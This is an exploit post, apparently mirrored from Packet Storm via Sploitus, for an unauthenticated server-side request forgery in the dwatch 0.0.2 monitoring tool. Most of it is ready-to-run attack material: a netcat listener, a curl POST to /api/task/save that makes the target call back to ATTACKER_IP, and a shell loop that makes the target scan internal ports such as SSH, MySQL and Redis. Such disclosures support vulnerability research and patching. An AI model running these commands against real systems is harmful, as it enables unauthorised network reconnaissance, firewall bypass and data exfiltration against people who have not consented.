Share
## https://sploitus.com/exploit?id=PACKETSTORM:219287
# Exploit Title: dwatch 0.0.2 - Unauthenticated SSRF via Task URL
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Software: https://github.com/dhjz/dwatch
    # Vendor: https://github.com/dhjz/dwatch
    # Version: Latest
    # Tested on: Linux
    
    
    # Description:
    dwatch is a website monitoring tool that allows unauthenticated users to
    create
    monitoring tasks via the /api/task/save endpoint. The 'url' parameter
    accepts
    arbitrary URLs and makes HTTP requests to them. This Server-Side Request
    Forgery
    (SSRF) vulnerability allows attackers to:
    
    1. Scan internal network services
    2. Access internal HTTP endpoints
    3. Bypass firewall restrictions
    4. Exfiltrate data to external servers
    
    # Proof of Concept:
    
    1. Set up listener on attacker machine:
       nc -lvnp 8888
    
    2. Create malicious task:
       curl -X POST "http://TARGET:3457/api/task/save" \
         -H "Content-Type: application/json" \
         -d '{"name":"SSRF PoC","url":"http://ATTACKER_IP:8888/ssrf","spec":"*/5
    * * * * *"}'
    
    3. Target executes request to attacker server, confirming SSRF.
    
    # Internal Network Scanning PoC:
    for port in 22 80 443 3306 5432 6379 8080 3457; do
      curl -X POST "http://TARGET:3457/api/task/save" \
        -H "Content-Type: application/json" \
        -d "{\"name\":\"scan_$port\",\"url\":\"http://127.0.0.1:$port\",\"spec\":\"*/10
    * * * * *\"}"
    done